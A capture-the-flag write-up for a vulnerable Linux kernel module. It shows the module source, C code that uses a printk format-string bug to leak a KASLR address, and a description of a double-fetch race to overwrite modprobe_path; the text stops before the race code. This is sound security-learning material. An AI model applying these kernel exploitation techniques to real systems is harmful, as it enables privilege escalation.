we can see that KASLR, SMEP and KPTI is enabled but not SMAP.
now let's take a look at the challenge, thankfully the author has provided us with the kernel module source code. we can interact with the module through the IOCTL interface
static long camping_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
switch (cmd) {
case KINTRO:
return camping_intro(arg);
case KGREET:
return camping_greet(arg);
case KVISIT:
return camping_visit(arg);
default:
printk(KERN_ALERT "camping: Invalid command\n");
return -EINVAL;
}
}
KINTRO
this command assigns the global visitor fields.
struct visitor_data {
char name[BUFFER_SIZE];
uint64_t location;
char decoration[BUFFER_SIZE];
} visitor;
static long camping_intro(unsigned long arg) {
if (copy_from_user(&visitor, (struct visitor_data __user *)arg, sizeof(visitor))) {
printk(KERN_ALERT "camping: intro failed\n");
return -EFAULT;
}
printk(KERN_INFO "camping: Welcome! Let's go camping and relax~\n");
return 0;
}
KGREET
this one uses the plain printk() without any log level (i.e. KERN_INFO, KERN_DEBUG etc), which prints to the program's stdout that provoke it instead of kernel log through dmesg.
static long camping_greet(unsigned long arg) {
char hello[] = KERN_ALERT "camping: Hello, ";
char greeting[BUFFER_SIZE + sizeof(hello) + 1];
memcpy(greeting, hello, sizeof(hello));
memcpy(greeting + sizeof(hello) - 1, visitor.name, BUFFER_SIZE);
printk(greeting);
printk(KERN_INFO "camping: I see you're ready for an adventure, let's visit a nice campsite! :)\n");
return 0;
}
KVISIT
visit copies the decoration field to the address at location.
static long camping_visit(unsigned long arg) {
printk(KERN_INFO "camping: So you want to visit that campsite huh, okay here we go!\n");
if (!access_ok((void __user *)visitor.location, BUFFER_SIZE)) {
printk(KERN_ALERT "camping: Sorry, that campsite is not open yet! ~_~\n");
return -EFAULT;
}
printk(KERN_INFO "camping: It looks a bit plain... let's add some decorations!\n");
int len = strnlen(visitor.decoration, BUFFER_SIZE);
for (int i = 0; i < len; i++) {
if (!isalnum(visitor.decoration[i])) {
printk(KERN_ALERT "camping: That decoration is... a bit questionable?\n");
return -EINVAL;
}
}
printk(KERN_INFO "camping: Decorating...\n");
memcpy((void __user *)visitor.location, visitor.decoration, len + 1);
printk(KERN_INFO "camping: Done! Your campsite is now beautifully decorated :)\n");
printk(KERN_INFO "camping: Enjoy your camping experience!\n");
return 0;
}
there are two function that I'm not familiar with here, first is access_ok()
access_ok -- Checks if a user space pointer is valid
which means the location field has to be an address within the user space.
second is isalnum() but I decided to take it for granted for its self explanatory name.
Exploitation
the first thing I take attention of is KASLR, one thing I took notice is printk(greeting); in KGREET which seems to be a format string vulnerability. so I took it to the test
int main(int argc, char *argv[]){
setvbuf(stdout, NULL, _IONBF, 0);
fd = open("/dev/camping", O_RDWR);
if (fd < 0){
perror("[-] open");
return 1;
}
printf("[+] Device opened successfully, fd: %d\n", fd);
for(int i = 0x0; i < BUFFER_SIZE/4; i++) {
strcat(payload.name, "%lx|");
}
if (ioctl(fd, KINTRO, &payload) != 0){
perror("[-] ioctl KINTRO");
return 1;
}
if (ioctl(fd, KGREET, NULL) != 0) {
perror("[-] ioctl KGREET");
return 1;
}
return 0;
}
However, even though I kinda already grasp the overall challenge and how to exploit it, this is ultimately where I got stuck because the address leak that we got from is somehow cropped
and so I thought I could use the f'%{offset}$p' format but as I test it, it doesnt seem to work. reading the printk's format documentation it does seems that the $ is not applicable
days after, I realized that is it actually being printed and can be shown if I resize the terminal. it seems that the kernel prints without taking the terminal's dimension into account and not wrap it around as shown in the picture below
after the the competition had ended the challenge author told us that he uses newline (of course, why didn't I think of that) for the work around on this problem and it definitely worked
int main(int argc, char *argv[]){
// ... snippet
for(int i = 0x0; i < BUFFER_SIZE/4; i++) {
strcat(payload.name, "%lx\n");
}
// ... snippet
}
I took the address with the higher address i.e. ffffffff00000000 and try to find it's offset from the kernel base.
to make sure it's reliable and not affected by FG-KASLR, I tried running it multiple times and making sure the offset is not changed.
next, using stdin we'll take the address and calculate the kernel base
next to get the flag, we'll going to use modprobe technique, I won't explain it in depth since there are other people who had done the job better than I could've had linked below:
first let's get the modprobe_path address and its offset (also as previously, double check to make sure its not affected by FG-KASLR)
to exploit it, we would need to have arbitrary write primitive, we could've easily had this through KVISIT:
static long camping_visit(unsigned long arg) {
// ... snippet
memcpy((void __user *)visitor.location, visitor.decoration, len + 1);
// ... snippet
}
however access_ok() will be denying our request since the address would be one in the kernel space instead of user space.
this could be bypassed through the vulnerability called double fetch explained here:
this is also similar to a challenge I have previously solved which is HTB's Kernel Adventures: Part 1
to do this, we'll need two asynchronous execution, one thread will continuously request for KVISIT, trying to trigger the memcpy :
while the other thread will continuously swap the values of location to satisfy access_ok() and decoration to satisfy isalnum() in the hopes that the race will satisfy both of the checks while contains our payload to overwrite modprobe by the time memcpy is called.
